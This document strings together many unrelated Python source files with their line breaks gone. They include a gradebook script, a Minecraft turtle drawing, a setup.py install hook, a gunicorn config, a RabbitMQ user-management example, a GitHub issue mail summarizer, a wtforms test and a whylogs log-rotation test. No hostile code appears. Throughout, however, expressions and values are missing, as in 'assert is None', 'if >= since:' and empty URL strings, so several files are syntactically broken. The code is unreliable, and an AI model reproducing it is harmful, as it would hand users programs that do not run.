#! /usr/bin/python # keep record of grades. Made by <NAME>. 0.1-PUBLIC # NOTE! All letter answers are to be written in quotes (including dates)! print """############################################ # Welcome to Gradebook! v 0.1 # # YOUR LIGHT WEIGHT SCHOOL RECORD MANAGER! # ############################################""" subject = raw_input("What is your assignment's subject? ") # ^^This asks your class subject; assigns it to 'subject'; and is used later. date = input('What is the date for your assignment? ') # ^^This is pretty much the same: but asks the date. amount = input('What is the number of questions? (NOTE: make all #s from now decimals. e.g.: "5.0" ') # ^^^This is also the same, but make the number a DECIMAL! correct = input('How many questions did you get correct? ') # ^^^The same... make all DECIMALS! calc = divmod(correct, amount) # This is a nice homework trick. Divides correct by amount, assigns to 'calc' calcx = (correct / amount) # divides correct by amount; assigns to 'calcx' text = "***%s*** \n %s | %d out of %d | %s or %s \n" % (date, subject, correct, amount, calc, calcx) # creates what will be in your file. assigns to 'text' print text # prints what it will put in your file (or append). fle = raw_input('What should I name the file to put the above data into? ') # prompts for a filename A = input('Do you want this to be appended to an existing file? ') # decides to either append,or to create new file. assigns answer to 'A' print 'Thanks! appending to file... ' if A is 'yes': #if you answered yes: fyl = open(fle, 'a') # the phrase 'fyl' is used to combine open('fle, 'a') with future commands fyl.write(text) # the command assigned to 'fyl' writes your data to the filename you said. fyl.close() # closes the file; job is done. elif A is 'no': # if you said no, this will happen: fyl = open(fle, 'w') # same as before, but saves the file (see the 'w' instead of 'a'?) fyl.write(text) # same fyl.close() # same else: # and if nothing was valid... print 'Error! Invalid transaction! ' # ...error message! print 'Done!' # says it is done raw_input("Press <RETURN> to quit.") # makes you type <enter> to quit.
# # Code by <NAME> and under the MIT license # from mineturtle import * import lsystem t = Turtle() t.pendelay(0) t.turtle(None) t.penblock(block.BRICK_BLOCK) # ensure angles are always integral multiples of 90 degrees t.gridalign() rules = {'X':'X+YF+', 'Y':'-FX-Y'} def go(): # draw a wall segment with a door t.pendown() t.penblock(block.BRICK_BLOCK) t.startface() for i in range(4): t.go(4) t.pitch(90) t.endface() t.penup() t.go(2) t.pendown() t.penblock(block.AIR) t.pitch(90) t.go(1) t.penup() t.pitch(180) t.go(1) t.pitch(90) t.go(2) dictionary = { '+': lambda: t.yaw(90), '-': lambda: t.yaw(-90), 'F': lambda: go() } lsystem.lsystem('FX', rules, dictionary, 14)
# lists print "\nlists" print min([1,2,3,4]) print min([2,1],[1,2],[1,1],[1,1,0]) # tuples print "\ntuples" print min((1,2,3,4)) print min((2,1),(1,2),(1,1),(1,1,0)) # dictionaries print "\ndictionaries" print min({1:2,3:4,5:6}) print min({1:6,3:4,5:2})
<gh_stars>1000+ from distutils.core import setup import os from setuptools.command.install import install class InstallWrapper(install): def run(self): # compile the relevant protobufs self.compile_proto() # Run the standard PyPi copy # remove the compiled protobufs self.cleanup() def compile_proto(self): # compile the protobufs os.system('cd anna && protoc -I=../../../../include/proto --python_out=. ' + 'kvs.proto') os.system('cd anna && protoc -I=../../../../include/proto --python_out=. ' + 'functions.proto') def cleanup(self): os.system('rm anna/') setup( name='Anna', version='0.1', packages=['anna', ], license='Apache v2', long_description='Client for the Anna KVS', install_requires=['zmq', 'protobuf'], cmdclass={'install': InstallWrapper} )
<filename>kqueen/ from kqueen.config import current_config from prometheus_client import multiprocess import multiprocessing import os app_config = current_config() bind = "{host}:{port}".format( host=app_config.get('KQUEEN_HOST'), port=app_config.get('KQUEEN_PORT'), ) timeout = 180 workers = multiprocessing.cpu_count() * 2 + 1 worker_class = 'gthread' # check for prometheus settings if 'prometheus_multiproc_dir' not in os.environ: raise Exception('Variable prometheus_multiproc_dir is required') def child_exit(server, worker): multiprocess.mark_process_dead(
<gh_stars>100-1000 from amqpstorm import management if __name__ == '__main__': # If using a self-signed certificate, change verify=True to point at your CA bundle. # You can disable certificate verification for testing by passing in verify=False. API = management.ManagementApi('', 'guest', 'guest', verify=True) API.user.create('my_user', 'password') # Get a user print(API.user.get('my_user')) # User that does not exist throws an exception API.user.delete('my_user') try: API.user.get('NOT_FOUND') except management.ApiError as why: if why.error_code == 404: print('User not found')
<reponame>randolphwong/mcsema<filename>boost/libs/iterator/doc/ #!/usr/bin/python # Copyright <NAME> 2004. Use, modification and distribution is # subject to the Boost Software License, Version 1.0. (See accompanying # file LICENSE_1_0.txt or copy at # # Generate html, TeX, and PDF versions of all the source files # import os import sys from syscmd import syscmd from sources import sources if 0: for s in sources: syscmd('boosthtml %s' % s) else: extensions = ('html', 'pdf') if len(sys.argv) > 1: extensions = sys.argv[1:] all = [ '%s.%s' % (os.path.splitext(s)[0],ext) for ext in extensions for s in sources ] print 'make %s' % ' '.join(all) syscmd('make %s' % ' '.join(all))
<gh_stars>100-1000 import os import sphinx os.chdir('../../../docs_sphinx') sphinx.main(['sphinx-build', '-b', 'doctest', '.', '../docs', '-D', 'exclude_patterns=reference'])
# from import DomainService # from seedwork.domain.value_objects import UUID # from .entities import Listing, Seller # from .repositories import ListingRepository # from .rules import ( # ListingMustBeInDraftState, # SellerMustBeEligibleForAddingNextListing, # ) # class CatalogService: # def publish_listing(self, listing: Listing, seller: Seller): # self.check_rule(ListingMustBeInDraftState(listing.status)) # self.check_rule(SellerMustBeEligibleForAddingNextListing(seller)) # listing.publish()
from vit.formatter.start import Start class StartRemaining(Start): def format_datetime(self, start, task): return self.remaining(start)
<gh_stars>1000+ #!/usr/bin/env python3 """ Generate a summary of last week's issues tagged with "topic: feature". The summary will include a list of new and changed issues and is sent each Monday at 0200 CE(S)T to the typing-sig mailing list. Due to limitation with GitHub Actions, the mail is sent from a private server, currently maintained by @srittau. """ from __future__ import annotations import datetime from dataclasses import dataclass from typing import Any, Iterable, Sequence import requests ISSUES_API_URL = "" ISSUES_URL = "" ISSUES_LABEL = "topic: feature" SENDER_EMAIL = "Typing Bot <<EMAIL>>" RECEIVER_EMAIL = "<EMAIL>" @dataclass class Issue: number: int title: str url: str created: datetime.datetime user: str pull_request: bool = False def main() -> None: since = previous_week_start() issues = fetch_issues(since) new, updated = split_issues(issues, since) print_summary(since, new, updated) def previous_week_start() -> today = return today - datetime.timedelta(days=today.weekday() + 7) def fetch_issues(since: -> list[Issue]: """Return (new, updated) issues.""" j = requests.get( ISSUES_API_URL, params={ "labels": ISSUES_LABEL, "since": f"{since:%Y-%m-%d}T00:00:00Z", "per_page": "100", "state": "open", }, headers={"Accept": "application/vnd.github.v3+json"}, ).json() assert isinstance(j, list) return [parse_issue(j_i) for j_i in j] def parse_issue(j: Any) -> Issue: number = j["number"] title = j["title"] url = j["html_url"] created_at = datetime.datetime.fromisoformat(j["created_at"][:-1]) user = j["user"]["login"] pull_request = "pull_request" in j assert isinstance(number, int) assert isinstance(title, str) assert isinstance(url, str) assert isinstance(user, str) return Issue(number, title, url, created_at, user, pull_request) def split_issues( issues: Iterable[Issue], since: ) -> tuple[list[Issue], list[Issue]]: new = [] updated = [] for issue in issues: if >= since: new.append(issue) else: updated.append(issue) new.sort(key=lambda i: i.number) updated.sort(key=lambda i: i.number) return new, updated def print_summary( since:, new: Sequence[Issue], changed: Sequence[Issue] ) -> None: print(f"From: {SENDER_EMAIL}") print(f"To: {RECEIVER_EMAIL}") print(f"Subject: Opened and changed typing issues week {since:%G-W%V}") print() print(generate_mail(new, changed)) def generate_mail(new: Sequence[Issue], changed: Sequence[Issue]) -> str: if len(new) == 0 and len(changed) == 0: s = ( "No issues or pull requests with the label 'topic: feature' were opened\n" "or updated last week in the typing repository on GitHub.\n\n" ) else: s = ( "The following is an overview of all issues and pull requests in the\n" "typing repository on GitHub with the label 'topic: feature'\n" "that were opened or updated last week, excluding closed issues.\n\n" "---------------------------------------------------\n\n" ) if len(new) > 0: s += "The following issues and pull requests were opened last week: \n\n" s += "".join(generate_issue_text(issue) for issue in new) s += "\n---------------------------------------------------\n\n" if len(changed) > 0: s += "The following issues and pull requests were updated last week: \n\n" s += "".join(generate_issue_text(issue) for issue in changed) s += "\n---------------------------------------------------\n\n" s += ( "All issues and pull requests with the label 'topic: feature'\n" "can be viewed under the following URL:\n\n" ) s += ISSUES_URL return s def generate_issue_text(issue: Issue) -> str: s = f"#{issue.number:<5} " if issue.pull_request: s += "[PR] " s += f"{issue.title}\n" s += f" opened by @{issue.user}\n" s += f" {issue.url}\n" return s if __name__ == "__main__": main()
from tests.common import DummyPostData from wtforms.fields import IntegerField from wtforms.form import Form class F(Form): a = IntegerField() b = IntegerField(default=48) def test_integer_field(): form = F(DummyPostData(a=["v"], b=["-15"])) assert is None assert form.a.raw_data == ["v"] assert form.a() == """<input id="a" name="a" type="number" value="v">""" assert == -15 assert form.b() == """<input id="b" name="b" type="number" value="-15">""" assert not form.a.validate(form) assert form.b.validate(form) form = F(DummyPostData(a=[], b=[""])) assert is None assert form.a.raw_data == [] assert is None assert form.b.raw_data == [""] assert not form.validate() assert len(form.b.process_errors) == 1 assert len(form.b.errors) == 1 form = F(b=9) assert == 9 assert form.a._value() == "" assert form.b._value() == "9" form = F(DummyPostData(), data=dict(b="v")) assert is None assert form.a._value() == "" assert form.b._value() == "" assert not form.validate() assert len(form.b.process_errors) == 1 assert len(form.b.errors) == 1
import sys, re from datetime import date version = sys.argv[1] release_date ='%Y-%m-%d') major, minor, patch = version.split('.') def replace(file_path, pattern, replacement): updated = re.sub(pattern, replacement, open(file_path).read()) with open(file_path, 'w') as f: f.write(updated) # Update changelog SEP = '---------------------' NEXT = f'Next\n{SEP}' changelog_header = f'{NEXT}\n\n{version} ({release_date})\n{SEP}' replace('', NEXT, changelog_header) # Update Doxyfile DOXY_VERSION = 'PROJECT_NUMBER = ' replace('Doxyfile', DOXY_VERSION + '.*', DOXY_VERSION + version) # Update CMakeLists.txt replace('CMakeLists.txt', '''SET\\(CBOR_VERSION_MAJOR "0"\\) SET\\(CBOR_VERSION_MINOR "7"\\) SET\\(CBOR_VERSION_PATCH "0"\\)''', f'''SET(CBOR_VERSION_MAJOR "{major}") SET(CBOR_VERSION_MINOR "{minor}") SET(CBOR_VERSION_PATCH "{patch}")''') # Update Sphinx replace('doc/source/', """version = '.*' release = '.*'""", f"""version = '{major}.{minor}' release = '{major}.{minor}.{patch}'""")
<filename>tests/component/ import cProfile import json import os import pstats from logging import getLogger from shutil import rmtree from time import sleep from typing import List import pandas as pd import pytest from import SessionConfig, WriterConfig from import session_from_config script_dir = os.path.dirname(os.path.realpath(__file__)) TEST_LOGGER = getLogger(__name__) def count_features(json_profile_filename): if not os.path.isfile(json_profile_filename): raise ValueError(f"{json_profile_filename} is not a json file but trying to open it to count features") profile = get_json_profile(json_profile_filename) if profile and profile.get("columns"): return len(profile["columns"].keys()) return 0 def get_json_profile(json_profile_filename): profile = {} if os.path.exists(json_profile_filename) and os.stat(json_profile_filename).st_size > 0: with open(json_profile_filename) as profile_file: profile = json.load(profile_file) return profile def assert_all_elements_equal(data: List): if not data or len(data) == 1: return True first = data[0] for element in iter(data): assert first[0] == element[0], f"Found differing feature counts: {first[0]} vs {element[0]} in files {first[1]} and {element[1]}" @pytest.mark.load def test_log_rotation_concurrency(tmpdir): log_rotation_interval = "1s" sleep_interval = 2 test_path = tmpdir.mkdir("log_rotation_concurrency_repro") writer_config = WriterConfig("local", ["json"], test_path.realpath(), filename_template="dataset_summary-$dataset_timestamp") # Load the full lending club 1000 csv, to get a chance at hitting the bug. csv_path = os.path.join(script_dir, "lending_club_1000.csv") full_df = pd.read_csv(csv_path) # full_df has shape (1000, 151) so create a test df with 4x size by iteratively appending to self 2 times for _ in range(2): full_df = full_df.append(full_df)"test dataframe has shape {full_df.shape}") # Create a whylogs logging session session_config = SessionConfig("project", "pipeline", writers=[writer_config]) session = session_from_config(session_config)"Running rotate log test with {log_rotation_interval} flush intervals and {sleep_interval}s pause") profiler = cProfile.Profile() profiler.enable() with session.logger(tags={"datasetId": "model-1"}, with_rotation_time=log_rotation_interval) as ylog: ylog.log_dataframe(full_df) # Log a larger dataframe to increase chance of rotation before seeing all columns sleep(sleep_interval) ylog.log_dataframe(full_df.head(n=2)) # Log a smaller dataframe to get more features before rotation sleep(sleep_interval) profiler.disable() stats = pstats.Stats(profiler).sort_stats("cumulative") output_files = [] for root, subdir, file_names in os.walk(test_path): if not file_names: continue if subdir: for directory in subdir: for file in file_names: full_file_path = os.path.join(root, directory, file) output_files += [full_file_path] else: for file in file_names: full_file_path = os.path.join(root, file) output_files += [full_file_path] assert len(output_files) > 0, "No output files were generated during stress test" TEST_LOGGER.debug(f"Generated {len(output_files)} dataset summary files.") feature_counts = [] for filename in output_files: feature_count = count_features(filename) if feature_count > 0: feature_counts.append((count_features(filename), filename)) assert len(feature_counts) > 0, f"feature counts are all empty, we expect some empty files with aggressive log rotation but not all empty!""Feature counts all same, first file with features was {feature_counts[0]}") TEST_LOGGER.debug(f"There were {len(feature_counts)} files with features.") assert_all_elements_equal(feature_counts) rmtree(test_path, ignore_errors=True) TEST_LOGGER.debug(f"End cleaning up test directory {test_path}")